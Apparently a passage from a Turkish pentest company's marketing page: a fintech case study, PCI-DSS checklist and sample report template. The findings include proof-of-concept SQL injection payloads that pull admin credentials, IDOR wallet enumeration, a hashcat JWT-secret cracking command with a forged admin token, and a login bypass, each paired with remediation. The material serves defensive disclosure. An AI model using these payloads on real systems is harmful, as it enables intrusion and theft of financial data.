Availability: High (A:H)
CVSS Score: 10.0 CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Başarı Hikayesi
Fintech Şirketi - Kritik SQL Injection Tespiti
Firma Profili:
- Sektör: Finans Teknolojileri (Ödeme Sistemleri)
- Kullanıcı: 450,000+ aktif kullanıcı
- Günlük işlem: 8.5M TL
- Platform: Web + Mobil uygulama
- Compliance: PCI-DSS Level 1, KVKK
Durum (Pentest Öncesi):
Mevcut Güvenlik:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ WAF (Web Application Firewall) - Cloudflare
✅ HTTPS (TLS 1.3)
✅ Rate limiting
✅ Basic güvenlik testleri (otomatik araçlar)
❌ Hiç profesyonel pentest yapılmamış
❌ Kaynak kod güvenlik analizi yok
Yönetim Görüşü:
"WAF var, HTTPS kullanıyoruz, güvenliyiz."
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Pentest Süreci:
Kapsam:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• Web uygulaması (public + auth)
• REST API (payment gateway)
• Mobil app (Android + iOS)
• Internal network (VPN üzerinden)
Metodoloji: Black-box + Gray-box
Süre: 3 hafta (15 iş günü)
Ekip: 3 senior pentest uzmanı (OSCP, OSWE)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Kritik Bulgular:
🔴 CRITICAL #1: Second-Order SQL Injection
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
CVE: Internal-2024-001
CVSS: 9.8 (CRITICAL)
Lokasyon: /api/v2/transactions/export
Zafiyet Detayı:
Kullanıcı "transaction notes" alanına SQL payload
yazabiliyor. WAF burada kontrol ediyor ve geçiyor.
Ancak admin panelinde "Export to Excel" özelliği
kullanıldığında, bu notlar SQL sorgusuna direkt
ekleniyor (sanitize edilmeden).
Proof of Concept:
-- 1. Adım: Normal kullanıcı girişi
POST /api/transactions
{
"amount": 100,
"notes": "Payment for invoice #1234' UNION SELECT
username,password,email,null,null FROM admin_users--"
}
-- WAF: PASSED (görünüşte normal metin)
-- 2. Adım: Admin "Export Excel" tıkladığında
SELECT t.id, t.amount, t.notes, t.date, t.status
FROM transactions t
WHERE t.date >= '2024-01-01'
AND t.notes LIKE '%Payment for invoice #1234' UNION
SELECT username,password,email,null,null FROM admin_users--%'
-- Sonuç: Admin kullanıcı ve şifreler Excel'de!
Etki:
→ Tüm admin şifreleri (hashed) çalınabilir
→ Müşteri verileri (ad, soyad, TC, IBAN)
→ Ödeme kartı token'ları
→ 450K kullanıcı verisi risk altında
Tahmini Zarar:
→ KVKK cezası: 2-20M TL (veri ihlali)
→ İtibar kaybı: Tahmini 50M+ TL
→ Toplam: 70M TL risk
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 CRITICAL #2: IDOR (Insecure Direct Object Reference)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
CVE: Internal-2024-002
CVSS: 8.5 (HIGH)
Lokasyon: /api/v2/wallet/{wallet_id}/balance
Zafiyet:
Wallet ID tahmin edilebilir (sequential: 100001, 100002...)
Authorization kontrolü yok!
PoC:
GET /api/v2/wallet/100001/balance
→ Kendi wallet'ım: 5,420 TL
GET /api/v2/wallet/100002/balance
→ Başkasının wallet'ı: 12,850 TL (!)
Etki:
→ 450K kullanıcının bakiyesi görülebilir
→ Hassas finansal veri ifşası
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🟠 HIGH #3: JWT Secret Brute-forceable
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
CVSS: 7.5 (HIGH)
Zafiyet:
JWT token'ı HS256 (HMAC) ile imzalanmış.
Secret key zayıf: "fintechApp2023"
# JWT token yakalama
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjM0LCJyb2xlIjoidXNlciJ9.xyz...
# hashcat ile secret brute-force
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
# 12 dakika sonra:
Secret found: "fintechApp2023"
# Artık herhangi bir kullanıcı için token üretebiliriz:
{
"user_id": 1,
"role": "admin" # ← Privilege escalation!
}
Etki:
→ Herhangi bir kullanıcı adına işlem
→ Admin yetkisi kazanma
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Toplam Bulgu:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔴 Critical: 2
🟠 High: 8
🟡 Medium: 14
🟢 Low: 23
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Remediasyon Planı:
Acil (24-48 saat):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. SQLi Düzeltme:
→ Parameterized queries (prepared statements)
→ Input validation (whitelist)
→ WAF rule güncelleme
2. IDOR Düzeltme:
→ UUID kullan (random, tahmin edilemez)
→ Authorization middleware ekle
→ Her request'te user_id kontrolü
3. JWT Secret:
→ 256-bit random secret generate et
→ Secret rotation policy (her 90 gün)
→ RS256 (asymmetric) geçiş planı
Kısa Vadeli (1-2 hafta):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• OWASP dependency check (outdated libs)
• Rate limiting iyileştirme
• Security headers (CSP, HSTS, X-Frame-Options)
• 2FA zorunlu hale getirme (admin)
• API versiyonlama ve deprecated endpoint kapatma
Uzun Vadeli (1-3 ay):
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• SAST/DAST otomasyonu (CI/CD pipeline)
• Security awareness eğitimi (dev team)
• Bug bounty programı
• Quarterly pentest
• SOC kurulumu (7/24 monitoring)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Sonuçlar (3 Ay Sonra):
Güvenlik İyileştirmeleri:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ Tüm Critical/High bulgular kapatıldı
✅ Re-test yapıldı: 0 Critical, 1 High (residual)
✅ Secure SDLC (Software Development Lifecycle) uygulandı
✅ Otomatik güvenlik tarama (CI/CD)
✅ Bug bounty programı başlatıldı (20 researcher)
İş Etkileri:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ Veri ihlali önlendi (tahmini 70M TL zarar)
✅ PCI-DSS audit başarıyla geçildi
✅ Müşteri güveni arttı (%12 kullanıcı artışı)
✅ Yatırımcı güveni (Series B funding başarılı)
Güvenlik Metrikleri:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Güvenlik skoru: 45/100 → 92/100 (+%104!)
Zafiyet tespit süresi: ∞ → 8 gün (ortalama)
Zafiyet kapatma süresi: - → 12 gün (ortalama)
Güvenlik farkındalığı: %23 → %87 (dev team)
ROI:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Pentest maliyeti: 85,000 TL
Önlenen zarar: 70,000,000 TL (tahmini)
ROI: 82,253% 🎉
Geri ödeme süresi: 0 gün (zarar önlendi)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Müşteri Yorumu:
"İlk başta 'Biz zaten güvenliyiz' diyorduk. Pentest
sonuçları şok ediciydi. Kritik SQLi zafiyetini
kötü niyetli biri bulsaydı, şirket kapanabilirdi.
Artık güvenlik development sürecinin bir parçası.
Her sprint'te security review, quarterly pentest
yapıyoruz. Güvenlik ekibimiz 2 kişiden 8 kişiye çıktı.
En değerli yatırımımız oldu."
— CTO, Fintech Şirketi
Compliance ve Standartlar
PCI-DSS Penetration Testing
PCI-DSS Requirement 11.3:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
"Penetration testing must be performed at least
annually and after any significant infrastructure
or application upgrade."
Kapsam:
✅ External penetration test (yearly)
✅ Internal penetration test (yearly)
✅ Application layer testing
✅ Network layer testing
✅ Segmentation testing
Pentest Checklist:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
□ Pre-engagement agreement
□ Scope definition (in/out of scope)
□ Methodology (PTES, OWASP)
□ External perimeter test
□ Internal network test
□ Web application test
□ Social engineering test (optional)
□ Wireless network test
□ Remediation validation
□ Executive report + technical report
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Pentest Raporlama
Rapor Yapısı
PENETRATION TEST RAPORU
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
1. EXECUTIVE SUMMARY (Yönetici Özeti)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• Test özeti (kapsam, süre)
• Kritik bulgular (high-level)
• İş riski değerlendirmesi
• Hızlı aksiyonlar
• Genel güvenlik skoru
Hedef Okuyucu: CEO, CTO, CISO, Yönetim Kurulu
2. TEST DETAYLARI
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• Tarih, süre, test tipi
• Kapsam (IP range, domain, sistemler)
• Kapsam dışı (out of scope)
• Metodoloji (PTES, OWASP)
• Test ekibi (certifications)
• Rules of Engagement
• Varsayımlar ve kısıtlamalar
3. TEKNİK BULGULAR
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Her zafiyet için:
Bulgu #1: SQL Injection - Login Form
┌─────────────────────────────────────────┐
│ Seviye: CRITICAL (CVSS 9.8) │
│ CVE: CVE-2024-XXXXX │
│ CWE: CWE-89 (SQL Injection) │
│ │
│ Lokasyon: │
│ https://target.com/login │
│ Parameter: username │
│ │
│ Açıklama: │
│ Login formunda SQL injection │
│ zafiyeti tespit edildi. Saldırgan │
│ authentication bypass edebilir. │
│ │
│ Proof of Concept: │
│ username: admin'-- │
│ password: [anything] │
│ → Authentication bypassed! │
│ │
│ Ekran Görüntüleri: │
│ [screenshot1.png] │
│ [screenshot2.png] │
│ │
│ Etki: │
│ • Tüm hesaplara yetkisiz erişim │
│ • Veri çalma (exfiltration) │
│ • Veri manipülasyonu │
│ │
│ Remediasyon: │
│ 1. Parameterized queries kullan │
│ 2. Input validation (whitelist) │
│ 3. WAF rule ekle │
│ 4. Stored procedure kullan │
│ │
│ Kod Örneği (Güvenli): │
# ❌ Zafiyet:
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
# ✅ Güvenli:
cursor.execute(
"SELECT * FROM users WHERE username=%s AND password=%s",
(username, password)
)
│ │
│ Referanslar: │
│ • OWASP A03:2021 Injection │
│ • CWE-89 │
│ • MITRE ATT&CK: T1190 │
└─────────────────────────────────────────┘
4. REMEDİASYON ROADMAP
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Öncelik Matrisi:
Acil (0-7 gün):
□ Critical #1: SQL Injection fix
□ Critical #2: IDOR fix
□ High #1: JWT secret rotation
Kısa Vade (7-30 gün):
□ High #2-8: [liste]
□ Medium (critical assets): [liste]
Uzun Vade (30-90 gün):
□ Remaining Medium/Low
□ Architecture improvements
□ Security awareness training
5. EKLER (APPENDICES)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
• Ek A: CVSS Skorlama Detayları
• Ek B: Kullanılan Araçlar
• Ek C: Test Metodolojisi
• Ek D: Raw Scan Output
• Ek E: Sözlük (Glossary)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Hemen Başlayın
Sistemlerinizi hackerlar saldırmadan test edin! Profesyonel penetrasyon testi ile güvenlik açıklarınızı tespit edin, saldırı senaryolarını simüle edin ve güvenlik seviyenizi ölçün. Gerçek dünya saldırı teknikleriyle kapsamlı güvenlik değerlendirmesi.
Penetrasyon Testi Hizmetlerimiz:
- ✅ Web uygulaması penetrasyon testi (OWASP Top 10)
- ✅ Network pentest (external + internal)
- ✅ Mobile app security test (iOS + Android)
- ✅ API güvenlik testi (REST, GraphQL)
- ✅ Cloud security assessment (AWS, Azure, GCP)
- ✅ Wireless network pentest (WiFi WPA/WPA3)
- ✅ Social engineering kampanyası
- ✅ Red team operasyonları
- ✅ Source code review (SAST)
- ✅ Compliance pentest (PCI-DSS, ISO 27001)
- ✅ Remediation validation (re-test)
- ✅ Executive + Technical rapor
Sertifikalı Pentest Ekibi: OSCP, OSWE, OSCE, CEH, GPEN, GWAPT
Ücretsiz Zafiyet Taraması!
Pentest Teklifi Al | Örnek Rapor İndir | Güvenlik Analizi Talep Et
İlgili Çözümler:
Popüler Aramalar: penetrasyon testi, pentest, etik hacking, güvenlik testi, zafiyet tespiti, vulnerability assessment, owasp, web app security, network pentest
Bu çözüm işletmeniz için uygun mu?
Uzman ekibimizle görüşün, size özel bir teklif hazırlayalım.